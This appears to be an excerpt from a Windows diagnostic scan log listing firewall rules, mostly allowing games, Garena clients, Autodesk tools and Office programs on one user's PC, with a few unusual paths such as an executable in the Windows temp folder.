FirewallRules: [{9E5F33CB-417B-4BDF-B6A6-FC3DAF5DC49E}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7E4F2F6A-ED44-4FA2-BAA7-992C9D283037}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{0D2B7B1C-BBC5-49B9-9EEE-6F7295AF2A75}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{757B1BF4-3E93-4F2F-A197-67C9747E7C3E}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [UDP Query User{800F6B14-FF41-4B25-9C26-E58146EEE86E}C:\program files (x86)\softnyx\gunbound\gungame.gme] => (Allow) C:\program files (x86)\softnyx\gunbound\gungame.gme
FirewallRules: [TCP Query User{E137CB7E-790E-4184-8F28-62112376F1CF}C:\program files (x86)\softnyx\gunbound\gungame.gme] => (Allow) C:\program files (x86)\softnyx\gunbound\gungame.gme
FirewallRules: [UDP Query User{CA79EB93-A466-4BF2-B942-EFDB4F300DC7}C:\program files (x86)\softnyx\gunbound\launcher.exe] => (Allow) C:\program files (x86)\softnyx\gunbound\launcher.exe
FirewallRules: [TCP Query User{3DFFEF5B-555B-4BCD-821A-A681F146A871}C:\program files (x86)\softnyx\gunbound\launcher.exe] => (Allow) C:\program files (x86)\softnyx\gunbound\launcher.exe
FirewallRules: [{7971F769-8D9C-49D9-9CA4-2E9673BB7E51}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1708.2116\gxxsvc.exe
FirewallRules: [{78B0E40E-7439-4CFF-B3AA-EDD99EFDBE5C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7F416953-6853-4EAA-9C9A-D541B6959D5E}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{E486882A-3F95-427A-A850-8DFEA0EA77CE}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1707.0619\gxxsvc.exe
FirewallRules: [{BA7A74AF-303D-4796-8DC0-7F728E34F66D}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{01E84514-675F-43F4-BF9E-A32CBD853436}] => (Allow) C:\Users\ouroboros\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{8B87A111-231E-4074-A108-0556709E0651}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe
FirewallRules: [{909770F2-D6D9-4AA2-9764-EC9F5BFF0F34}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe
FirewallRules: [{FDC883D1-338C-466A-84B4-88109FFDA32B}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{76AF7528-A941-472E-A6EF-CD82A65DED0D}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{09EBE196-FCFA-4737-A3FE-6D7105D4B5A8}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{260C39BF-E014-4E13-9856-E469C6A25410}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{93B62DA2-760F-45F2-8A15-88F8C81783B0}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F4BFDD40-95DA-4E87-B895-991D7A44200C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{33BF9629-9E29-441D-AC3E-72B72EC05CBB}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F0726F34-A7D6-40C6-9D25-EB50AD8C1559}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9391C468-D775-4DE8-8B43-0564ACBA3608}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F756EE63-FC8B-4DB9-BE6B-5A767FDEE7BD}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DEA8B699-8EA8-469B-AF55-4DCCAFC22DA6}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{A1CAC7FA-276F-43BF-9608-69A04A886B68}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6665C4A1-D32C-4A88-85ED-C53E5DA7635A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{AE7417BE-77BC-4A84-9F6C-61AFEC9CDA89}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{32876558-A457-44E4-A01C-F86A02B6EA6F}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{880D9D4E-230D-47BF-9305-94E72AD0ADB2}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{14308E06-909C-4208-8120-0CF7136EBBAE}] => (Allow) D:\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{02C18A76-2D33-4EF2-A850-4208566ABF83}] => (Allow) D:\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{BC5C3A59-A8C5-4597-85B2-FF79E6761A65}] => (Allow) D:\Steam\steamapps\common\Montaro\nw.exe
FirewallRules: [{5DBD7AB2-89CE-4EDD-9566-80AFBA26D913}] => (Allow) D:\Steam\steamapps\common\Montaro\nw.exe
FirewallRules: [{23B6ED51-8756-48A9-A2FF-70958249F3F6}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{27844BEF-6FA6-4805-BD08-86BAE66045D8}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DA762A41-B6BD-4F04-A819-06A7167954D5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{55F92D04-A226-487A-8E00-9BE754E0F0AD}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D51EE89F-0E50-403F-ADB8-A385E6D7EB10}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DA2933D5-E477-46B7-89B6-D894DF70B773}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{DCD7CCA3-9C4E-4591-BBD8-E8C42F875320}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1706.2319\gxxsvc.exe
FirewallRules: [{FB3425C4-BFE5-4F90-984D-22DEA75A92C3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A3593865-DA07-4BDE-BD0E-689CB1AB4974}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{29125B35-BF9B-4C18-8116-ED14861FCCCA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1EFCD02B-425A-487C-8EED-30EF29101D9C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1315A5F1-35E8-46F8-A372-1B5C9D2D64E6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{731E68A1-303F-4426-9718-DB86366D52EF}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{775DA3E0-62B7-40D8-95EE-16D5D4C37D45}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Dreamweaver CC 2014\Dreamweaver.exe
FirewallRules: [UDP Query User{51A07625-BEDA-4A37-97B3-6643B65B5CBE}C:\program files\autodesk\maya2014\bin\mayabatch.exe] => (Allow) C:\program files\autodesk\maya2014\bin\mayabatch.exe
FirewallRules: [TCP Query User{B8CD7A39-DCF3-4EBB-A686-53EDBE7A341B}C:\program files\autodesk\maya2014\bin\mayabatch.exe] => (Allow) C:\program files\autodesk\maya2014\bin\mayabatch.exe
FirewallRules: [{113B921C-EA74-48C6-ACE3-BC185CC68FF7}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1706.0112\gxxsvc.exe
FirewallRules: [{D4F1C83C-D15D-4650-A3D6-7423750F200E}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1705.2300\gxxsvc.exe
FirewallRules: [{BE9595A9-9887-4BDE-B15F-7289119BDF2A}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\server.exe
FirewallRules: [{2B0768A4-103C-413A-8C3B-385CCC1C1933}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\server.exe
FirewallRules: [{D6B4C737-433C-40BA-8649-1418346AC5B2}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\manager.exe
FirewallRules: [{4FEB8A5B-8E44-4697-A62D-74BA3B57D7E8}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\manager.exe
FirewallRules: [{7B09C145-5130-4CFE-8D68-6AA341347355}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\monitor.exe
FirewallRules: [{F513367C-0055-4D7B-B4A4-F0050F545FA7}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\monitor.exe
FirewallRules: [{FAF190D2-3D8A-47DD-B1B6-3BEABC4358F0}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1705.1510\gxxsvc.exe
FirewallRules: [{03DC8E43-9735-4939-9BD3-1C21AAAD9422}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [UDP Query User{325F6A0B-6C73-40A1-B5A9-5425398086E5}D:\grand theft auto v\gta5.exe] => (Allow) D:\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{F034CC39-731E-4868-B62A-0A541C4EC905}D:\grand theft auto v\gta5.exe] => (Allow) D:\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{7FAA20A4-A6E4-4016-BE7B-24522CC31852}C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{7876120A-77CA-4DD8-A14C-B0A18E2AA89E}C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\ouroboros\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{B32F8576-3523-4345-A6FD-09FF0B15CDD7}D:\garena plus\updatemanager.exe] => (Allow) D:\garena plus\updatemanager.exe
FirewallRules: [TCP Query User{90CB7603-BAA0-458E-80AF-E44F71E2EA11}D:\garena plus\updatemanager.exe] => (Allow) D:\garena plus\updatemanager.exe
FirewallRules: [{3357E87A-742C-4DE6-A018-662D02CF6468}] => (Allow) D:\Steam\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{541E4D8A-ACE6-42FB-AD30-D70FBC7471FA}] => (Allow) D:\Steam\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{608E5591-ED17-4616-BC5C-A8C0F15759F3}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [{C565B510-A8E3-4D9E-9913-381477649B42}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [{0937940D-FB15-49C8-AE9F-754BAD581E89}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [{F0582FA5-A771-4EE0-A4CD-025F7C6E29F8}] => (Allow) C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\chrome.exe
FirewallRules: [UDP Query User{C9CD0CC8-212A-43AD-B46E-B09C141FFC9D}C:\windows\temp\files\bin\kmss.exe] => (Allow) C:\windows\temp\files\bin\kmss.exe
FirewallRules: [TCP Query User{D2B63009-9E97-4A00-8C8C-93C187075789}C:\windows\temp\files\bin\kmss.exe] => (Allow) C:\windows\temp\files\bin\kmss.exe
FirewallRules: [UDP Query User{6DD611FA-E691-4598-831F-07DC5EB805FC}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [TCP Query User{5D169CA9-AB9B-4A1F-8C80-A5B43B623A03}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [{5FFF49E6-1BE7-41D8-8569-2DF01AFD3C6A}] => (Allow) LPort=6953
FirewallRules: [{43BAE99B-E83D-493A-BF00-D12EBB8F91F0}] => (Allow) LPort=6953
FirewallRules: [{7FCC8BBA-4EA9-476C-9187-0A0DE4340956}] => (Allow) LPort=6941
FirewallRules: [{8854E2CA-097D-4E03-99F3-DFA013BDB854}] => (Allow) LPort=6941
FirewallRules: [{94A577A7-D029-41DA-9E92-C0450CC923FD}] => (Allow) LPort=6896
FirewallRules: [{2C950BE0-409A-43F4-8FEE-DDECD718FDED}] => (Allow) LPort=6896
FirewallRules: [{4747EEAC-FD54-4B81-AD6F-2259CD75F6C1}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{6500A046-533C-4C54-B71F-2558D0CF3458}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{065F80C8-AB08-4784-9E70-8E20B708B835}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{F6B3A1F6-397C-464B-BFB5-BBDD88CCA9E3}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{38E0492B-2C83-48D6-9850-6C800A082CB4}] => (Allow) LPort=8370
FirewallRules: [{503C95E0-D8C5-45EC-8DE3-CCAFFE867B11}] => (Allow) LPort=8370
FirewallRules: [{7149536F-61E4-41EB-B370-F94F996A2C10}] => (Allow) D:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{F0A3FF89-C692-477A-8B67-6B3343DF83BA}] => (Allow) D:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{F79BAABB-C45D-4A0A-A7EA-704CF93EB55C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{AB009857-1720-4F0B-B2CD-BCB4BD2BDD35}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [UDP Query User{15C6C466-3C24-4AE3-9DA7-F9C7FF365986}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [TCP Query User{93D18ECC-4402-4945-9778-2E0E683A095E}D:\garena plus\bbtalk\bbtalk.exe] => (Allow) D:\garena plus\bbtalk\bbtalk.exe
FirewallRules: [{C2638AA3-CCA4-43FD-967C-43FB9D48CB53}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{862E82FA-FC0E-4839-8EC6-8BCCC5718878}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{2CBFE814-CFB1-45C1-9314-4C6E2279C6AA}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{A554E6E4-6F52-433F-9249-9DE7FF14D9BC}] => (Allow) D:\LolGarenaPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{697AE15A-955D-4179-A81A-CC0EE0A7D7D4}] => (Allow) LPort=8370
FirewallRules: [{7804A345-3F36-402A-93AB-6E2484B976A1}] => (Allow) LPort=8370
FirewallRules: [UDP Query User{4489F0AC-501A-46A6-9370-404174FBCBA1}D:\garena plus\garenamessenger.exe] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [TCP Query User{6FEE892A-E089-4724-9CDC-D4BEFE8EEE64}D:\garena plus\garenamessenger.exe] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [{927F1B6C-E5F4-4596-AFA9-B98FC4819403}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{79F3CA2E-8EFA-4DA4-B296-EA3BA19050C9}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{56401C5F-519E-4BBE-88B0-107DC3875B01}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{E3996533-10A6-4737-8CB4-20AE967DB3BA}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{1D788C5B-F185-4DDD-8FCD-1D2451733740}] => (Allow) C:\WINDOWS\SysWOW64\ftp.exe
FirewallRules: [{E539E2FB-D8DA-4EDD-9B78-FDDC0A3DD357}] => (Allow) C:\WINDOWS\SysWOW64\ftp.exe
FirewallRules: [{90B67AD3-A675-46BD-9CD9-7A923B82AA47}] => (Allow) C:\WINDOWS\system32\ftp.exe
FirewallRules: [{E43ADB07-910A-41DC-8349-2B71AB6C8EEE}] => (Allow) C:\WINDOWS\system32\ftp.exe
FirewallRules: [{B3FE2AF6-4F32-4BC7-91BA-B30BF4776D8C}] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [{D18C7D5F-DEC8-4EDD-A44C-5EFF2B98076B}] => (Allow) D:\garena plus\garenamessenger.exe
FirewallRules: [{3E030108-8FB2-42C7-9334-E07DC64E0B0D}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [{307B5C5F-5FDD-4264-883F-7518CCFCD731}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [{DDB485FC-C59A-4AF8-B097-6A616E49999D}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [{C6F72EAA-3003-4C29-A297-77A8F42EEBC7}] => (Allow) C:\Program Files\Autodesk\Maya2014\bin\maya.exe
FirewallRules: [TCP Query User{B5E6B107-EB49-4A20-8763-FD204B275989}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [UDP Query User{5BD72A11-9275-471C-82CB-2E7DFCED77FF}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [TCP Query User{087BC06E-1A12-4D65-B764-4EEE6A11B936}D:\mortal kombat xl\binaries\retail\mk10.exe] => (Allow) D:\mortal kombat xl\binaries\retail\mk10.exe
FirewallRules: [UDP Query User{800600F4-99D7-43AD-840D-5D4A96E7058D}D:\mortal kombat xl\binaries\retail\mk10.exe] => (Allow) D:\mortal kombat xl\binaries\retail\mk10.exe
FirewallRules: [{C0BA3FAB-88F8-4D6C-A142-0DDD6E7BD4A5}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{0C0058E4-9909-49CC-94DD-79684A3D159B}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{FB5322FF-C84A-4E54-8190-C152E8C30134}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{4DB5FAC9-A635-4852-AAFE-F3E2FDC67DC9}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{25C58122-C0B9-43F7-9E0E-F854CDAFC6DC}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{B81F780D-2C5E-462F-9675-214224C5F487}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [TCP Query User{84455F40-63A8-4BA2-969B-F3CB34C560FA}D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe] => (Allow) D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe
FirewallRules: [UDP Query User{D87F26CB-F0C5-4B44-B11D-8751DE4DFB83}D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe] => (Allow) D:\steam\steamapps\common\hatred\hatred\binaries\win64\hatred-win64-shipping.exe
FirewallRules: [{8C60E014-5BA1-4232-A9F7-5A42D6E33520}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{F2A73D26-7D41-49F4-A9B1-4F0A2058C9CE}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{076ED648-FE11-45AE-B83C-701B9BC0EAF8}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{71A4475F-D81E-4274-9383-C0272980E477}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{6B9206C2-AD51-4D99-8815-5B89006B0BE9}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D3B39784-D1F2-4729-8F88-0F60B3578ACB}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7E5816D5-72A7-4469-A5D0-EF17FAE54A70}] => (Allow) D:\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{F264A0B8-8C5E-4017-88B9-2E12DA472B9B}] => (Allow) D:\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{C741A11E-137C-4D9B-BC7C-021DEA2758D5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{222928A5-DD53-4E28-9A2A-F9A13AD6B67B}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{94DF1BCD-AF32-41EC-A022-7DD369F6EF9F}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{89907266-F45C-4FC0-953F-9825D86E168A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{692CEA2A-BB9C-4DE3-B4FA-08B0DEB238D8}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{6AEE019D-152E-451D-8914-9BE1CF2F341D}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Air\LolClient.exe
FirewallRules: [{9D34750C-DCAD-42C5-B921-A8535058BF6D}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{15B43387-22C7-4368-9560-73871E113B96}] => (Allow) D:\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{8B07649C-80A8-4C44-B349-1A586ECB1EDB}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1703.1720\gxxsvc.exe
FirewallRules: [{F11EF63E-505F-481D-9405-12CCD0A813B7}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{B819D63D-4E17-44AE-8747-BC79A6A98C7A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{A9E70FF9-BD1B-4DD5-8FE6-627EF2590C36}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F81C4E27-C86F-421E-9FB5-918740CF990F}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6B37EC85-38ED-4000-A7BC-FB516AC9BBB5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{E82DC81F-B962-424E-8C46-F98552721F04}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{07DB9EDC-7B1C-4D36-83AE-D5016632C647}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{C3718472-91E0-416C-AC9D-CA4204C0E4DF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{C579EB47-2156-4857-9E2F-492A6C8CB5E0}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{5B62D0F5-DCA7-4754-A550-9E2FFE9B9BAF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{3390EC79-3916-4EB1-8BBE-D20C7A321A1A}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{E4D2110F-B355-47A6-B200-816AA578D94B}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{2EEE8FC2-9E28-47F4-939F-461F511E42F1}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{A0FD1C53-A1B9-4391-8713-6A431D0832D2}] => (Allow) D:\Ableton\Program\Ableton Live 9 Suite.exe
FirewallRules: [{72EAC743-83FC-4473-B7B7-B62FC9C5FDD4}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{730CEC08-DD0D-4D86-9B7E-E5EB9B7497E6}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{1255066D-ED2C-409B-96F9-59B83D62C686}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{DD795B58-5FB7-40BC-B50D-EA6ED4F3B950}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{41895A07-18E0-47F4-BAEB-3EEC60CFAAE5}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{7F050CA6-5EEC-42A5-8653-80E13BD9A856}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{15C38A1D-1158-4485-B7C6-B6E6E04A240E}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{5C5B2D6A-626C-4AC8-BF3F-AAA46E82FFA4}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{05E42D2F-A64D-4CE7-B53C-4C61DE29421F}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{AD31C9C1-9F35-4696-A697-627B4165ECAE}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{DEB1916B-3837-4824-B93A-D20D4CB67555}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{88021022-AE0D-417D-8008-55D09A1B1B77}] => (Allow) D:\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{26F129BC-EF6E-41D7-892B-4A2378D8F34D}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{C692CCAE-EDC9-427F-B259-FFD92B7D72CB}] => (Allow) D:\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{E47AB6B3-8E01-4E9B-B0AC-FF8AF9B565CF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D16727D3-BCF4-4838-A82D-E57B87C38005}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6BF6D327-3A16-45F4-AFF9-398D234D7862}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{25B528C3-73E4-4C75-83E2-0E59958689BC}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1704.0418\gxxsvc.exe
FirewallRules: [{B45F4195-0BC8-41CF-BCCB-89571FE63606}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{D94CA53D-6E3E-47F3-97F4-BBF900254FC1}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{FA7F7987-EE3C-4FA3-A413-AD5429793835}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9553B895-FCAA-44AA-9AA1-CD9AF90EB0C8}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{3F3279FC-202A-4B75-A15B-9441285336B2}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1704.1819\gxxsvc.exe
FirewallRules: [TCP Query User{0A79DDB8-EB20-4841-B545-FF6CFE562206}C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe] => (Allow) C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe
FirewallRules: [UDP Query User{0597DFE3-2022-494E-A071-8D55DF1331AF}C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe] => (Allow) C:\users\ouroboros\appdata\local\programs\blackboard\blackboard collaborate launcher\resources\java\jre1.7.0_80\bin\javaw.exe
FirewallRules: [{0890A195-51FC-48DE-82C7-E4AEE1F1E22B}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1704.2712\gxxsvc.exe
